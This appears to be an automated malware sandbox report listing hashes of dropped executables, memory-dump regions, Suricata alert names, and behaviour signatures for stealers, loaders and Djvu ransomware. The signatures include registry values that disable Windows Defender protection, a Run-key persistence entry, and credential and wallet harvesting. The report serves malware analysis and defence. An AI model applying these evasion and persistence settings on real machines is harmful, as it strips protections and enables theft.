| SHA1 | 86e6208697a0a52686a6227ccd15eeadad850e6a |
| SHA256 | 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275 |
| SHA512 | a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854 |
\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe
| MD5 | b22cf896430a7bae5e38c51a7e0ac494 |
| SHA1 | 86e6208697a0a52686a6227ccd15eeadad850e6a |
| SHA256 | 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275 |
| SHA512 | a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854 |
\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe
| MD5 | b22cf896430a7bae5e38c51a7e0ac494 |
| SHA1 | 86e6208697a0a52686a6227ccd15eeadad850e6a |
| SHA256 | 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275 |
| SHA512 | a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854 |
C:\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe
| MD5 | b22cf896430a7bae5e38c51a7e0ac494 |
| SHA1 | 86e6208697a0a52686a6227ccd15eeadad850e6a |
| SHA256 | 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275 |
| SHA512 | a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854 |
C:\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe
| MD5 | c7a7b834e68cece0ac292bc991af7908 |
| SHA1 | bf22bead8421057fe31242b1cd1c6d87b1f4cbdc |
| SHA256 | 954cd93ab4f96ea2d6c6eacc796ed2657e50dcc1e5646665067f5c06835b86a4 |
| SHA512 | 5e1c5119951eb061c2dc3d9abc65f9e501e11dde6c5a2b7f5494937f602828069969d09c318efe51b2a405b16f2e36cef24ffadd173d3e33f473bf7efce50bc3 |
memory/1640-162-0x0000000000000000-mapping.dmp
\Users\Admin\Pictures\Adobe Films\eeMXA1PvRwQEPGdOiDQDaBjy.exe
| MD5 | 5163ae847dec4b423a4e9b1eb43d3864 |
| SHA1 | 15e41ab0f8b44ae83baf879f04e60ff68f5959d1 |
| SHA256 | 4ac6ba19c72728768d7d070d3a00fe605a2a8500f0301b8a42028b702dafd430 |
| SHA512 | 84f9a42bbe81e837836b3eec3440174cfae66087ca8c9339999a52c80f4fcf13d44bec35c60a9d286fa3dfa54d2b48a9e3285de4257a018220294b601f775e2b |
\Users\Admin\Pictures\Adobe Films\eeMXA1PvRwQEPGdOiDQDaBjy.exe
| MD5 | 5163ae847dec4b423a4e9b1eb43d3864 |
| SHA1 | 15e41ab0f8b44ae83baf879f04e60ff68f5959d1 |
| SHA256 | 4ac6ba19c72728768d7d070d3a00fe605a2a8500f0301b8a42028b702dafd430 |
| SHA512 | 84f9a42bbe81e837836b3eec3440174cfae66087ca8c9339999a52c80f4fcf13d44bec35c60a9d286fa3dfa54d2b48a9e3285de4257a018220294b601f775e2b |
memory/1060-152-0x0000000000000000-mapping.dmp
memory/1996-185-0x0000000000C71000-0x0000000000C9E000-memory.dmp
memory/1088-186-0x0000000000400000-0x0000000000885000-memory.dmp
memory/1996-188-0x00000000023C0000-0x000000000240D000-memory.dmp
\Users\Admin\Pictures\Adobe Films\f1deYbzXiXvkh0j_e5Nz8E7D.exe
| MD5 | b57d28ba7854b185f098a538af3b8e36 |
| SHA1 | c36d58fcec162801c15768b78c36b1464e9cbb66 |
| SHA256 | e64be99aa47e8f713b6189431159963c8c383563f6f0831a36d56991eefcf8ec |
| SHA512 | f74e9f42baed911d8a1f615f7ecddb63550519475e20c2f9b6b6cb76c6cf332bd89e3f3da731b529a29fb5c0111c7cfa48296e5daf9901585d98987c7e485a9d |
\Users\Admin\Pictures\Adobe Films\f1deYbzXiXvkh0j_e5Nz8E7D.exe
| MD5 | b57d28ba7854b185f098a538af3b8e36 |
| SHA1 | c36d58fcec162801c15768b78c36b1464e9cbb66 |
| SHA256 | e64be99aa47e8f713b6189431159963c8c383563f6f0831a36d56991eefcf8ec |
| SHA512 | f74e9f42baed911d8a1f615f7ecddb63550519475e20c2f9b6b6cb76c6cf332bd89e3f3da731b529a29fb5c0111c7cfa48296e5daf9901585d98987c7e485a9d |
memory/1088-189-0x0000000000400000-0x0000000000885000-memory.dmp
\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe
| MD5 | c7a7b834e68cece0ac292bc991af7908 |
| SHA1 | bf22bead8421057fe31242b1cd1c6d87b1f4cbdc |
| SHA256 | 954cd93ab4f96ea2d6c6eacc796ed2657e50dcc1e5646665067f5c06835b86a4 |
| SHA512 | 5e1c5119951eb061c2dc3d9abc65f9e501e11dde6c5a2b7f5494937f602828069969d09c318efe51b2a405b16f2e36cef24ffadd173d3e33f473bf7efce50bc3 |
\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
| MD5 | 15777ae423417df86584aac2148b5d44 |
| SHA1 | e5d89fc00ee12af8168b5ff7a947f2718f95ea6c |
| SHA256 | 3873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5 |
| SHA512 | 9fedb0be63761c533d010656197c1778d496caadb4c83cb7a32841a11535ff5fd0de51a2c7b59e3c5663ab8367a4ff60f4aa45284421dd553c0efc25f3bb13a1 |
\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
| MD5 | 15777ae423417df86584aac2148b5d44 |
| SHA1 | e5d89fc00ee12af8168b5ff7a947f2718f95ea6c |
| SHA256 | 3873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5 |
| SHA512 | 9fedb0be63761c533d010656197c1778d496caadb4c83cb7a32841a11535ff5fd0de51a2c7b59e3c5663ab8367a4ff60f4aa45284421dd553c0efc25f3bb13a1 |
C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
| MD5 | 15777ae423417df86584aac2148b5d44 |
| SHA1 | e5d89fc00ee12af8168b5ff7a947f2718f95ea6c |
| SHA256 | 3873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5 |
| SHA512 | 9fedb0be63761c533d010656197c1778d496caadb4c83cb7a32841a11535ff5fd0de51a2c7b59e3c5663ab8367a4ff60f4aa45284421dd553c0efc25f3bb13a1 |
\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe
| MD5 | 4aa2ed3cbbc9843b66715959adf53589 |
| SHA1 | f52474066e53f13ea9eff8144c2c9ed17318ba98 |
| SHA256 | 336c28695850bb8182b8a1baed4c64ca5aff7b35cb8fcbcdb954a9b9c709b640 |
| SHA512 | 98366485496f6f3ce81ada5578ddc7a580e902a75a728f4d14e7c79d15df6b4104f0eed3a09e06e48113666d918abdb1ad78ef5d9595c78ea19c495b9a66b744 |
memory/1088-154-0x0000000000000000-mapping.dmp
\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
| MD5 | 45abb1bedf83daf1f2ebbac86e2fa151 |
| SHA1 | 7d9ccba675478ab65707a28fd277a189450fc477 |
| SHA256 | 611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f |
| SHA512 | 6bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c |
memory/1900-99-0x0000000000000000-mapping.dmp
\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
| MD5 | a7f0db730ffc25346b807b44e22d76e2 |
| SHA1 | 2cd65e498430b3a083437bbb004c85194743fcba |
| SHA256 | 2e7b5d0e19e55b6a2874d14c700d53949ffdbd02f51bf617d1a92dbaf8521f3d |
| SHA512 | a101b64f8660c9d9392811c2ba7745863065b8c498955362e7df56de7d1b3ed5a488ec70941baf748095bba2ea85d6fb04ab3901c72ad5742d3d3791380cfb8b |
\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
| MD5 | a7f0db730ffc25346b807b44e22d76e2 |
| SHA1 | 2cd65e498430b3a083437bbb004c85194743fcba |
| SHA256 | 2e7b5d0e19e55b6a2874d14c700d53949ffdbd02f51bf617d1a92dbaf8521f3d |
| SHA512 | a101b64f8660c9d9392811c2ba7745863065b8c498955362e7df56de7d1b3ed5a488ec70941baf748095bba2ea85d6fb04ab3901c72ad5742d3d3791380cfb8b |
memory/1088-190-0x0000000000E40000-0x0000000000E64000-memory.dmp
memory/2008-104-0x0000000000000000-mapping.dmp
\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe
| MD5 | b22cf896430a7bae5e38c51a7e0ac494 |
| SHA1 | 86e6208697a0a52686a6227ccd15eeadad850e6a |
| SHA256 | 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275 |
| SHA512 | a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854 |
memory/1440-191-0x0000000002700000-0x0000000002759000-memory.dmp
memory/1512-107-0x0000000000000000-mapping.dmp
\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe
| MD5 | b22cf896430a7bae5e38c51a7e0ac494 |
| SHA1 | 86e6208697a0a52686a6227ccd15eeadad850e6a |
| SHA256 | 22bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275 |
| SHA512 | a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854 |
memory/2324-193-0x0000000000000000-mapping.dmp
memory/1996-194-0x0000000000400000-0x0000000000A94000-memory.dmp
memory/2356-195-0x0000000000000000-mapping.dmp
memory/2336-196-0x0000000000000000-mapping.dmp
memory/1060-192-0x00000000024E0000-0x0000000002B65000-memory.dmp
memory/2348-197-0x0000000000000000-mapping.dmp
memory/1520-199-0x00000000001C0000-0x0000000000219000-memory.dmp
memory/2336-200-0x0000000001390000-0x00000000013E9000-memory.dmp
memory/2336-201-0x0000000000100000-0x0000000000159000-memory.dmp
memory/2336-202-0x0000000000100000-0x0000000000159000-memory.dmp
memory/2496-203-0x0000000000000000-mapping.dmp
memory/1088-204-0x0000000000FB0000-0x0000000000FD2000-memory.dmp
memory/2544-207-0x0000000000000000-mapping.dmp
memory/2536-210-0x0000000000000000-mapping.dmp
memory/2604-213-0x0000000000000000-mapping.dmp
memory/2616-214-0x0000000000000000-mapping.dmp
memory/364-217-0x00000000026B0000-0x00000000026E0000-memory.dmp
memory/364-218-0x0000000002820000-0x0000000002850000-memory.dmp
memory/364-219-0x0000000000C91000-0x0000000000CBC000-memory.dmp
memory/364-220-0x00000000002A0000-0x00000000002D8000-memory.dmp
memory/364-222-0x0000000000400000-0x0000000000A93000-memory.dmp
memory/2716-223-0x0000000000000000-mapping.dmp
memory/2748-225-0x0000000000000000-mapping.dmp
memory/1900-226-0x0000000000400000-0x0000000000C96000-memory.dmp
memory/1520-227-0x00000000001C0000-0x0000000000219000-memory.dmp
memory/1996-228-0x00000000023C0000-0x000000000240D000-memory.dmp
memory/1440-229-0x0000000002700000-0x0000000002759000-memory.dmp
memory/1520-230-0x0000000001390000-0x00000000013E9000-memory.dmp
memory/1520-231-0x00000000001C0000-0x0000000000219000-memory.dmp
memory/1996-232-0x0000000000C71000-0x0000000000C9E000-memory.dmp
memory/2716-234-0x0000000002640000-0x0000000002674000-memory.dmp
memory/2716-235-0x00000000028F0000-0x0000000002924000-memory.dmp
memory/1520-237-0x00000000001C0000-0x0000000000219000-memory.dmp
memory/1060-238-0x00000000024E0000-0x0000000002B65000-memory.dmp
memory/1440-236-0x0000000002700000-0x0000000002759000-memory.dmp
memory/2716-239-0x0000000000240000-0x0000000000340000-memory.dmp
memory/2896-241-0x0000000000000000-mapping.dmp
memory/2716-240-0x00000000003C0000-0x00000000003FA000-memory.dmp
memory/2716-243-0x0000000000400000-0x0000000000A93000-memory.dmp
memory/2896-244-0x00000000011A0000-0x00000000011AE000-memory.dmp
memory/2956-245-0x0000000000000000-mapping.dmp
memory/2336-247-0x0000000001390000-0x00000000013E9000-memory.dmp
memory/2336-248-0x0000000000100000-0x0000000000159000-memory.dmp
memory/2992-249-0x0000000000000000-mapping.dmp
memory/3004-250-0x0000000000000000-mapping.dmp
memory/1440-253-0x0000000003EE0000-0x0000000004163000-memory.dmp
memory/364-254-0x0000000000C91000-0x0000000000CBC000-memory.dmp
memory/1460-255-0x0000000000000000-mapping.dmp
memory/2716-257-0x0000000000240000-0x0000000000340000-memory.dmp
memory/1068-258-0x0000000000130000-0x00000000002F0000-memory.dmp
memory/1068-259-0x0000000004950000-0x00000000049DE000-memory.dmp
memory/1068-260-0x0000000000BE0000-0x0000000000C2C000-memory.dmp
memory/568-261-0x0000000000000000-mapping.dmp
memory/1060-263-0x0000000000BC0000-0x0000000000D5D000-memory.dmp
memory/568-264-0x0000000068F20000-0x00000000694CB000-memory.dmp
memory/1060-265-0x00000000009F0000-0x0000000000BE2000-memory.dmp
memory/568-266-0x0000000068F20000-0x00000000694CB000-memory.dmp
memory/2716-267-0x0000000000240000-0x0000000000340000-memory.dmp
memory/2716-268-0x0000000000400000-0x0000000000A93000-memory.dmp
memory/1060-269-0x00000000009F0000-0x0000000000BE2000-memory.dmp
memory/364-270-0x0000000000C91000-0x0000000000CBC000-memory.dmp
memory/364-271-0x0000000000400000-0x0000000000A93000-memory.dmp
memory/1088-272-0x0000000000400000-0x0000000000885000-memory.dmp
memory/1900-273-0x0000000000400000-0x0000000000C96000-memory.dmp
memory/2172-274-0x0000000000400000-0x0000000000C96000-memory.dmp
memory/2000-275-0x0000000000321000-0x000000000034E000-memory.dmp
memory/2320-278-0x0000000000000000-mapping.dmp
memory/2728-279-0x0000000000000000-mapping.dmp
memory/2264-282-0x0000000000000000-mapping.dmp
memory/2964-287-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2964-288-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2964-290-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2964-291-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2964-292-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2964-293-0x000000000041824E-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-07-05 10:59
Reported
2022-07-05 11:07
Platform
win10v2004-20220414-en
Max time kernel
450s
Max time network
453s
Command Line
Signatures
Amadey
Colibri Loader
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Glupteba
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
Modifies visibility of file extensions in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" | N/A | N/A |
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | N/A | N/A |
PrivateLoader
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe |
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5248 created 1624 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe |
| PID 5248 created 4588 | N/A | C:\Windows\system32\svchost.exe | C:\Windows\rss\csrss.exe |
| PID 5248 created 4588 | N/A | C:\Windows\system32\svchost.exe | C:\Windows\rss\csrss.exe |
| PID 5248 created 4588 | N/A | C:\Windows\system32\svchost.exe | C:\Windows\rss\csrss.exe |
| PID 5248 created 2892 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe |
| PID 5248 created 2892 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe |
Vidar
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Generic gate .php GET with minimal headers
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata: ET MALWARE Win32/Colibri Loader Activity
suricata: ET MALWARE Win32/Colibri Loader Activity M2
suricata: ET MALWARE Win32/Colibri Loader Activity M3
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\RunDll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\ProgramData\50543188494393494002.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\6DF1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\EH46E.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7BCD.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4A1B.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3A8A.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4A1B.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Accesses 2FA software files, possible credential harvesting
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Windows\SysWOW64\rundll32.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" | C:\Users\Admin\AppData\Local\Temp\0BB4J.exe | N/A |
